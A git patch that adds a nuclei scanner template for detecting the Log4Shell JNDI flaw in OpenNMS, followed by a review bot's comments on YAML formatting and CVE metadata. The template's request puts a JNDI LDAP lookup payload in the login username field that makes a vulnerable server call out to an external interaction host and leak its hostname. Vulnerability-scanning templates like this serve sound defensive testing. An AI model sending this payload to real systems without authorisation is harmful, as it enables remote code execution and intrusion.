From 35d13abbb07a82a821bb4a04212b9da9c81fdd80 Mon Sep 17 00:00:00 2001
From: johnk3r
Date: Thu, 14 Jul 2022 10:31:10 -0300
Subject: [PATCH] Create opennms-log4j-jndi-rce.yaml
---
 .../other/opennms-log4j-jndi-rce.yaml | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 vulnerabilities/other/opennms-log4j-jndi-rce.yaml
diff --git a/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
new file mode 100644
index 0000000000..818a03f7f1
--- /dev/null
+++ b/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
@@ -0,0 +1,42 @@ +id: opennms-log4j-jndi-rce + +info: + name: OpenNMS Log4J JNDI RCE + author: johnk3r + severity: high + description: OpenNMS Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker + who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/ + - https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/ + classification: + cve-id: CVE-2021-44228 + tags: jndi,log4j,rce,cve,cve2021,opennms + +requests: + - raw: + - | + POST /opennms/j_spring_security_check HTTP/1.1 + Referer: {{RootURL}}/opennms/login.jsp + Content-Type: application/x-www-form-urlencoded + + j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
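Review bot: The `description` value (new lines 7–8) is a plain scalar that continues onto a second line (`... An attacker` / `who can control log messages ...`), so it depends on YAML silently folding a multi-line plain scalar and is fragile under reformatting; writing it as `description: >-` with both sentences indented beneath it makes the intent explicit. The `classification` block carries only `cve-id`; nuclei templates typically also record `cvss-metrics`, `cvss-score` and `cwe-id`, and taking those values from the CVE-2021-44228 record would let consumers filter and rank this template consistently with the rest of the corpus. The `regex` matcher and the `extractors` entry repeat the same pattern, and since `matchers-condition: and` already requires the `dns` word matcher, a short comment such as `# the dns interaction alone confirms the lookup; this regex only feeds the hostName extractor` would make that redundancy read as deliberate rather than accidental.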